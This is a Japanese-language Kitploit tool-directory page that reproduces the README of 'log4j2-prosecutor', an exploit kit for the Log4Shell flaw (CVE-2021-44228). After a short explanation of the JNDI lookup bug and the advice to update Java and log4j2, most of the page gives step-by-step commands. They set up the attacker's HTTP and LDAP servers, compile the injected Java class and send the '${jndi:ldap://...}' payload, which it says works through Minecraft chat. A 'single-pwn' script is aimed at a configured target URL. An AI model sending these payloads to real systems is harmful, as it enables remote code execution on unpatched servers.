Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j2-prosecutor — CVE-2021-44228 | Kitploit
ツール/GitHubGitHub/rodfer0x80/log4j2-prosecutor
ペイロード生成脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubrodfer0x80/log4j2-prosecutor

log4j2-prosecutor

CVE-2021-44228

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

log4j2-prosecutor

動機

この根本的な脆弱性は [CVE-2018-3149](https://nvd.nist.gov/vuln/detail/CVE-2018-3149) として報告され、[この記事(8u121 リリースノート)](https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) によって修正されました。

しかし、log4j2 と呼ばれる Java 用ロギングライブラリには (JNDILookup)[CVE-2021-44228](https://github.com/apache/logging-log4j2/blob/20f9a97dbe5928c3b5077bcdd2a22ac92e941655/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/JndiLookup.java) が存在し、LDAP などのプロトコルへのアクセスが許可されていたため、古い Java バージョンではコードインジェクションが可能になっていました。

パッチ適用済みの Java バージョンはコードインジェクションを防ぐことができますが、`JNDILookup` は LDAP サーバーにリクエストを行うため、IP アドレスの漏洩につながる可能性があります。

解決策は **Java** と **log4j2** のバージョンを更新することです。

実行方法

  1. 依存関係をインストールする
root@kitploit:~
cd http-server && npm install && cd ../ldap-server && npm install
  1. http-server と ldap-server の両方を実行する
root@kitploit:~
cd http-server && node index.js &
cd ldap-server && node index.js
  1. Main.java をコンパイルする
root@kitploit:~
# This will generate Main.java - required to code injection .
# OSx
./java-single-compile <Main.java>
# Linux 
javac <Main.java>
  1. パラメータ付きで JVM を起動する
root@kitploit:~
# You can still use log4j-client in repo for internal testing.
cd log4j-client &&\
		gradle jar &&\
		java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Or run other application, com.sun.jndi.ldap.object.trustURLCodebase=true required for code injection, otherwise it will only request to ldap server.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar <javafile.jar>
  1. ペイロードを任意のパラメータとして送信する (Minecraft では、エクスプロイトが機能していれば、チャットで送信するだけで動作します。)
root@kitploit:~
${jndi:ldap://127.0.0.1:3001/}
  1. クリーンアップする
root@kitploit:~
NODEP=`pgrep node`
for id in $NODEP; do
    kill $id
done

スクリプト

root@kitploit:~
# Single target pwn
# Edit exploit-configs.txt with url and params
cd scripts/single-pwn && python3 __main__.py

参照

  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/NCSC-NL/log4shell
  • https://github.com/ilsubyeega/log4j2-exploits/
  • https://raw.githubusercontent.com/ferderplays/Log4j_exploit/main/Exploit.java
  • https://www.blumira.com/analysis-log4shell-local-trigger/ (TODO)

ライセンス [GPL3]

ライセンスは LICENSE を参照してください。

ツールをダウンロード